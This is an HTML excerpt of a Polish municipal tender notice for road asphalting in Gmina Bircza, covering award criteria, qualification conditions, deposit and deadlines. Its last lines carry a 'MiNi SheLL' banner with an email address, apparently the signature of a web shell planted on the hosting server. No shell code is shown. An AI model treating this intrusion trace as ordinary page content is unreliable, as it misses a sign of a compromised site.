class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający przewiduje udzielenie zamówienia w ramach prawa opcji o którym mowa w art. 441 ust. 1 ustawy Pzp. <br/>2. W ramach przedmiotu umowy Zamawiający, uprawniony jest do skorzystania z prawa opcji skorzystać w całości lub w części; <br/>3. Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego; <br/>4. Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia od Zamawiającego (oświadczenia), że zamierza z prawa opcji skorzystać, zawierającego wskazany zakres w ramach przedmiotowego uprawnienia Zamawiającego; <br/>5. Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak obowiązujące przy realizacji zamówienia podstawowego. <br/>6. Szczegółowe wymagania dotyczące sposobu udzielenia zamówienia w ramach prawa <br/>określone w Projektowanych postanowieniach umowy - załącznik nr 7 do SWZ. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy, polegać one będą min. na wykonaniu remontów nawierzchni dróg gminnych, przepustów, robót ziemnych w ciągu dróg na terenie Gminy Bircza w zakresie do 40 % ilości podanej w zamówieniu podstawowym. Wartość tych robót została uwzględniona przy obliczeniu całkowitej wartości zamówienia. Ewentualne zamówienia udzielone zostaną na podobnych warunkach umownych jak zamówienie podstawowe. Cena negocjowana będzie w oparciu o aktualny poziom cen rynkowych. Możliwość udzielenia zamówienia w trybie art. 214 ust. 1 pkt 7 ustawy jest jedynie uprawnieniem Zamawiającego i nie stanowi żadnego wiążącego zobowiązania.<br/>Roboty podobne dla robót drogowych będących przedmiotem postępowania przetargowego polegać będą na wykonaniu prac drogowych dotyczących m.in. <br/>	robotach ziemnych, <br/>	wykonaniu nawierzchni z mechanicznym obcięciem krawędzi, <br/>	wycięciu/usunięciu uszkodzonych miejsc, <br/>	wykonaniu robót rozbiórkowych istniejącej nawierzchni, <br/>	wymiany i wzmocnienia konstrukcji, <br/>	wykonaniu warstwy wzmacniającej z kruszywa łamanego, <br/>	podbudowy i nawierzchni, <br/>	wykonaniu nawierzchni asfaltowej, <br/>	wykonaniu utwardzenia poboczy przy krawędzi jezdni kruszywem łamanym.<br/>	odcinkowe odtworzenie i oczyszczenie rowów drogowych, <br/>	oczyszczenia i/lub przebudowy przepustów.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i<br/>odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI/ RĘKOJMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 15.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>3)	sytuacji ekonomicznej lub finansowej: <br/>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 1 milion złotych (słownie: jeden milion złotych)*, przy czym środki finansowe <br/>i zdolność kredytowa mogą być sumowane do wymaganej przez Zamawiającego wysokości.<br/><br/>WYJAŚNIENIA:<br/>*	w przypadku, gdy wysokość posiadanych środków finansowych lub wysokość zdolności kredytowej jest określona w innej walucie niż w złotych polskich, Wykonawca dokona przeliczenia tej wartości na złote polskie - na podstawie średniego kursu złotego w stosunku do walut obcych określonego w Tabeli Kursów Narodowego Banku Polskiego na dzień publikacji Ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej.<br/>	w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższy warunek podlega sumowaniu, tzn. że wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą łącznie spełniać warunek. W przypadku złożenia oferty przez Wykonawcę, który polega na sytuacji ekonomicznej lub finansowej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp powyższy warunek podlega sumowaniu, tzn. że wykonawca wspólnie z podmiotem udostępniającym zasoby muszą łącznie spełniać warunek.<br/><br/>4)	zdolności technicznej lub zawodowej: <br/>Zamawiający uzna warunek za spełniony, jeżeli:<br/>Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 1 (słownie: jedną) osobą pełniącą funkcję kierownika budowy która: <br/>a) posiada uprawnienia budowlane do kierowania robotami budowlanymi <br/>w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa, oraz przynależącą do właściwej Izby Samorządu Zawodowego oraz posiada minimum 5 letnie doświadczenie jako kierownik budowy (lub kierownik robót) oraz kierowała realizacją co najmniej jednej roboty budowlanej (w rozumieniu pkt 7 art. 3 ustawy prawo budowlane) należycie zrealizowanej w ramach jednego zamówienia (dla potrzeb postępowania, zamówienie to także: jedna umowa/jeden stosunek zobowiązaniowy zrealizowany bez zastosowania ustawy Pzp) polegającą (lub obejmującą swoim zakresem) budowę lub przebudowę lub remont dróg o nawierzchni bitumicznej lub mineralno-bitumicznej o wartości co najmniej 1 000 000,00 zł. brutto (słownie: jeden milion zł. 00/100) przez cały okres jej trwania (t. j. od momentu przekazania terenu budowy do momentu dokonania odbioru końcowego robót),<br/>oraz <br/>b) Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował należycie <br/>co najmniej jedną robotę budowlaną (w rozumieniu pkt 7 art. 3 ustawy prawo budowlane) polegającą (lub obejmującą swoim zakresem) na budowie lub przebudowie lub remoncie dróg o nawierzchni bitumicznej lub mineralno - bitumicznej w ramach jednego zamówienia (dla potrzeb postępowania, zamówienie to także: jedna umowa/jeden stosunek zobowiązaniowy zrealizowany bez zastosowania ustawy Pzp), o wartości co najmniej 1 000 000,00 zł. brutto (słownie: jeden milion zł. 00/100).<br/><br/>WYJAŚNIENIA:<br/>1)	zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane za uprawnienia budowlane odpowiadające wyżej wymienionym uznane zostaną uprawnienia, które wydane zostały na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu - EFTA <br/>z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane oraz ustawy z dnia 22 grudnia 2015 r. <br/>o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej;<br/>2)	definicje: budowa, przebudowa i remont należy interpretować zgodnie z ustawą Prawo budowlane (art. 3 odpowiednio pkt 6, 7a i 8);<br/>3)	wszystkie ww. osoby kadry technicznej muszą posługiwać się językiem polskim lub w przypadku braku znajomości języka polskiego przez w/w osoby, Wykonawca zobowiązany jest na własny koszt do zapewnienia tłumacza języka polskiego w celu stałego bieżącego i symultanicznego tłumaczenia w kontaktach pomiędzy Zamawiającym <br/>a personelem Wykonawcy;<br/>4)	przez posiadanie uprawnień budowlanych wymaganych prawem dla osób uczestniczących w realizacji zamówienia, rozumie się uprawnienia do wykonywania samodzielnych funkcji w budownictwie <br/>w rozumieniu art. 15a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. 2021 r, poz. 2351 z późn. zm.) oraz przepisów wcześniejszych. Samodzielne funkcje techniczne w budownictwie (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich nadania.<br/>Wykonawca w celu wykazania spełniania warunków określonych w pkt 14.1 ppkt 4) SWZ może wskazać osobę będącą obywatelem państwa członkowskiego UE, która nabyła kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznaczne wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej – zgodnie z właściwymi przepisami, w szczególności z ustawą <br/>z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z 2020 r., poz. 220) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r. poz. 1117);<br/>5)	wszystkie w/w osoby kadry technicznej muszą posługiwać się językiem polskim lub w przypadku braku znajomości języka polskiego przez w/w osoby, Wykonawca zobowiązany jest na własny koszt <br/>do zapewnienia tłumacza języka polskiego w celu stałego bieżącego i symultanicznego tłumaczenia w kontaktach pomiędzy Zamawiającym a personelem Wykonawcy.<br/><br/>15.2. W przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższe warunki w zakresie pkt 15.1. ppkt 4 lit. a) podlega sumowaniu, tzn. <br/>że wykonawcy wspólnie ubiegający się o udzielenie zamówienia lub gdy wykonawca polega <br/>na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp muszą łącznie spełniać warunek tzn. wspólnie dysponować osobą <br/>o wymaganych uprawnieniach oraz z odpowiednim doświadczeniem.<br/>15.3. W przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia lub gdy wykonawca polega na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp warunek określony w pkt 15.1 ppkt 4 lit b) nie podlega sumowaniu, tzn. że przynajmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiot udostępniający zasoby musi wykazać się realizacją roboty budowlanej o wskazanych parametrach w której wykonaniu bezpośrednio uczestniczył.<br/>15.4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">18.2.2	W celu wykazania spełnienia braku podstaw wykluczenia wykonawca składa na wezwanie zamawiającego następujących podmiotowych środków dowodowych: <br/>•	OŚWIADCZENIA WYKONAWCY O AKTUALNOŚCI INFORMACJI ZAWARTYCH W OŚWIADCZENIU, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: <br/>a)	art. 108 ust. 1 pkt 1 ustawy, Pzp<br/>b)	art. 108 ust. 1 pkt 2 ustawy, Pzp<br/>c)	art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się <br/>o zamówienie publiczne tytułem środka zapobiegawczego, <br/>d)	art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>zgodnie z załącznikiem nr 10 do SWZ.<br/><br/>18.3.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych <br/>w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, dane umożliwiające dostęp do tych środków.<br/>18.4.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">18.2	W celu spełnienia warunków udziału w postępowaniu, o których mowa w pkt 15 Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>18.2.1	W celu wykazania spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu dot. zdolności technicznej lub zawodowej należy przedłożyć:<br/>a)	WYKAZ OSÓB skierowanych przez Wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu stanowi załącznik nr 4 do SWZ).<br/>b)	WYKAZ ROBÓT BUDOWLANYCH wykonanych nie wcześniej niż w okresie ostatnich <br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty <br/>te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty (wzór wykazu robót stanowi załącznik nr 9 do SWZ).<br/><br/>18.2.1.1. W celu wykazania spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu dot. sytuacji ekonomicznej lub finansowej należy przedłożyć:<br/>•	INFORMACJI z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 19.5.	Kompletna oferta zawiera:<br/>19.5.1.	FORMULARZ OFERTOWY – wg wzoru stanowiącego załącznik nr 1 do SWZ,<br/>19.5.2.	OŚWIADCZENIE O NIEPODLEGANIU WYKLUCZENIU ORAZ SPEŁNIENIU WARUNKÓW W POSTĘPOWANIU w zakresie wskazanym w pkt 19.2. SWZ – <br/>wg wzoru stanowiącego załącznik nr 2 do SWZ,<br/>19.5.3.	OŚWIADCZENIE PODMIOTU UDOSTĘPNIAJĄCEGO ZASOBY, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału <br/>w postępowaniu – wg wzoru stanowiącego załącznik nr 3 do SWZ (jeżeli dotyczy),<br/>19.5.4.	OŚWIADCZENIE Wykonawców wspólnie ubiegających się o udzielenie zamówienia z którego wynika, które roboty budowlane lub dostawy lub usługi wykonają poszczególni wykonawcy; wg wzoru stanowiącego załącznik nr 6 do SWZ (jeżeli dotyczy),<br/>19.5.5.	ZOBOWIĄZANIE podmiotu udostępniającego zasoby wg wzoru stanowiącego załącznik <br/>nr 5 do SWZ (jeżeli dotyczy),<br/>19.5.6.	PEŁNOMOCNICTWO LUB INNY DOKUMENT POTWIERDZAJĄCY UMOCOWANIE DO REPREZENTOWANIA WYKONAWCY - jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w ppkt 19.7.2. Warunek ten dotyczy również odpowiednio osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz podwykonawców. Pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty. <br/>19.5.7.	DOKUMENT ZAPŁATY WADIUM, w przypadku wniesienia w poręczeniach lub gwarancjach.<br/>19.5.8.	ZASTRZEŻENIE TAJEMNICY PRZEDSIĘBIORSTWA (jeżeli dotyczy),<br/>19.5.9.	WYKAZ ROZWIĄZAŃ RÓWNOWAŻNYCH wykonawca załącza do oferty wykaz rozwiązań równoważnych z jego opisem lub normami; (jeżeli dotyczy).<br/><br/>19.6.	Podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w niniejszym <br/>pkt 19.5.4 oraz zobowiązanie podmiotu udostępniającego zasoby, oraz pełnomocnictwo przekazuje się w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wymagania dotyczące wadium.<br/>1)	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie 60 000,00 zł (słownie: sześćdziesiąt tysięcy złotych 00/100). <br/>2)	wadium musi obejmować pełen okres związania ofertą, o którym mowa w rozdz. 23.<br/>3)	wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp;<br/>4)	wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy nr: <br/>11 9113 1014 2003 5000 0228 0044.<br/>Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego);<br/>5)	wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty <br/>w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>a)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. <br/>Beneficjentem wskazanym w gwarancji lub poręczeniu musi być: <br/>Miasto i Gmina Bircza, ul. Ojca Św. Jana Pawła II 10, 37-740 Bircza <br/>NIP: 795-23-08-157, REGON: 650900476,<br/>b)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>c)	kwotę gwarancji/poręczenia,<br/>d)	termin ważności gwarancji/poręczenia,<br/>e)	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp;<br/>6)	w przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp;<br/>7)	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1 - 5 ustawy Pzp;<br/>8)	Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oferta przedstawiona przez dwóch lub więcej Wykonawców (współpartnerów) wchodzących w skład konsorcjum lub spółki cywilnej musi być przedstawiona, jako jedna oferta, od jednego podmiotu i spełniać następujące wymagania:<br/>1)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika (lidera)<br/>do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu <br/>i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Umocowanie należy przedłożyć wraz z ofertą – treść pełnomocnictwa powinna dokładnie określać zakres umocowania,<br/>2)	wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie <br/>z pełnomocnikiem (liderem),<br/>3)	jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, zostanie wybrana, zamawiający zastrzega możliwość żądania przed zawarciem umowy w sprawie zamówienia publicznego, przedłożenia umowy regulującej współpracę tych Wykonawców,<br/>4)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia <br/>i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się <br/>o zamówienie,<br/>5)	wypełniając formularz oferty, jak również inne dokumenty powołujące się na „Wykonawcę” należy wpisać dane dotyczące wszystkich współpartnerów, a nie ich pełnomocnika – lidera lub jednego ze współpartnerów,<br/>6)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika, które roboty budowlane lub dostawy lub usługi wykonają poszczególni wykonawcy (wzór załącznika nr 6 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający przewiduje udzielenie zaliczki na poczet wykonania zamówienia w wysokości co najmniej 5 % wartości zaoferowanej ceny brutto, przy czym ostateczna wysokość zaliczki uzależniona jest zaoferowanej wysokości oferty złożonej przez Wykonawcę. Szczegóły opisane zostały w projektowanych postanowieniach umowy stanowiących - załącznik nr 7 do SWZ. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 26.1. Projektowane postanowienia umowy stanowią załącznik nr 7 do SWZ. <br/>Złożenie oferty jest jednoznaczne z akceptacją przez wykonawcę projektowanych postanowień umowy.<br/>26.2. Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną na piśmie,<br/>w formie aneksu do niniejszej umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 455 ust. 1 ustawy Prawo zamówień publicznych. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym w Projektowanych postanowieniach umowy. stanowiącym załącznik nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/bircza</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-15 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 19.13.	Tajemnica przedsiębiorstwa:<br/>Protokół, oferty oraz wszelkie oświadczenia i zaświadczenia składane w postępowaniu o zamówienie publiczne są jawne. Jeśli oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa <br/>w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, Wykonawca powinien nie później niż w terminie składania ofert, zastrzec, że nie mogą one być udostępnione oraz wykazać, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca, w celu utrzymania w poufności tych informacji, powinien przekazać je w wydzielonym i odpowiednio oznaczonym pliku. Zamawiający udostępni na wniosek zainteresowanego jawną część dokumentacji.<br/>19.13.1 Zastrzeżenie informacji, które nie stanowią tajemnicy przedsiębiorstwa w rozumieniu ustawy <br/>o zwalczaniu nieuczciwej konkurencji będzie traktowane, jako bezskuteczne i skutkować będzie ich odtajnieniem.

Creat By MiNi SheLL
Email: jattceo@gmail.com